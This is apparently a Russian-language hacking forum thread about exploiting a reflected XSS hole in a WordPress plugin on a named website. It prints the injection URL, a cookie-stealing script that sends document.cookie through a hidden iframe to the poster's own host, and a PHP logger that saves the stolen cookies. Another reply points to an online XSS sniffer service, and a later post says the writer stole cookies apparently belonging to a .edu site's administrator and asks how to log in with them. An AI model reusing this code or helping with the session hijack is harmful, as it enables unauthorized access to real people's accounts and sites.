Вообщем потихоньку начал вникать в ХСС и столкнулся с такой проблемой. http://www.gamechangers.com/index.html/wp-content/plugins/simple-flash-video/stats/?action=regenerate&query=&date=201109%22%3E%3CSCRIPT%3Ealert%28/xss/.source%29%3C/SCRIPT%3E Перейдя по ссылки видим всплывающий алерт с надписью ХСС. Делаю вывод что ХСС активная уязвимость присутствует. Далее заливаю к себе на хостинг следующие файлы: file.js : PHP: document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://mysite.com/qwerty/file.php'+'?host='+location.host+'&cook='+document.cookie+'"></iframe>'); file.php : PHP: <? $file = fopen("cookies.txt","a"); fputs($file,"[".date("d.m.y H:i")."]: host=".$_GET[‘host’].", COOKIES=”.$_GET[‘cook’].”\r\n"); fclose($file); ?> И вставляю в уезвимое место следующий код: <script src=http://mysite.com/qwerty/file.js></script> В результате в файл куки.тхт ничего не записывается. Права на запись на хостинге поставил .. Подскажите где ошибка ?
Я сам новичок, но xss у меня получилась , просто использовал online xss sniffer этот : http://hacker-pro.net/sniffer/ , и не нужно было создавать свой сайт , и писать снифер , в этом снифере уже все готово и готовые скрипты есть которые надо вставлять. Попробуй может подойдет тебе. Я его использовал для тренировки.
Получил успех сегодняшней ночью спёр куки вроде бы как у админа сайта .edu Вопрос как теперь их заюзать чтоб зайти под ним ?
